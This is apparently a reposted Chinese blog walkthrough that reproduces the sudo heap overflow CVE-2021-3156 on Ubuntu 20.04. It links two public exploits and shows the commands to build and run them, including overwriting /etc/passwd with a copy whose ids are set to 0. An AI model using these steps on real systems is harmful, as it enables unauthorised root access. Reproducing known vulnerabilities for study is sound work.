【CVE-2021-3156】sudo缓冲区溢出漏洞复现(凑热闹)

只愿长相守 提交于 2021-02-04 10:48:52

注:以下操作均在ubuntu20.04环境下演示,其他环境尚未测试


exp1演示

利用细节:

https://www.kalmarunionen.dk/writeups/sudo/

exp地址:

https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
操作如下:

test@dz:~/CVE-2021-3156$ iduid=1001(test) gid=1001(test) 组=1001(test)test@dz:~/CVE-2021-3156$ lsb_release -aNo LSB modules are available.Distributor ID:  UbuntuDescription:  Ubuntu 20.04.1 LTSRelease:  20.04Codename:  focaltest@dz:~/CVE-2021-3156$ uname -aLinux dz 5.4.0-47-generic #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linuxtest@dz:~/CVE-2021-3156$ sudo -VSudo 版本 1.8.31Sudoers 策略插件版本 1.8.31Sudoers 文件语法版本 46Sudoers I/O plugin version 1.8.31test@dz:~/CVE-2021-3156$ iduid=1001(test) gid=1001(test) 组=1001(test)test@dz:~/CVE-2021-3156$ makerm -rf libnss_Xmkdir libnss_Xgcc -o sudo-hax-me-a-sandwich hax.cgcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.ctest@dz:~/CVE-2021-3156$ lsCVE-2021-3156_nss_poc_ubuntu  hax.c  lib.c  libnss_X  Makefile  sudo-hax-me-a-sandwichtest@dz:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich


exp2演示

exp地址:

https://github.com/stong/CVE-2021-3156

exp演示地址:

https://twitter.com/gf_256/status/1355354178588180481

注意:操作之前先备份/ect/passwd或者先做个镜像

git clone https://github.com/stong/CVE-2021-3156.gitcd CVE-2021-3156/gcc ./expsploit.c./a.out

cp /etc/passwd kanpasswdgedit kanpasswd#把用户id和组id换为0

./a.out /etc/passwd kanpasswd

cat /etc/passwdsu kanhayou2

声明:
如需转载,请联系作者
请勿利用文章内的相关技术从事非法测试
如因此产生一切不良后果与作者和本公众号无关

本文分享自微信公众号 - 小白学IT(xiaobaixueIT)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!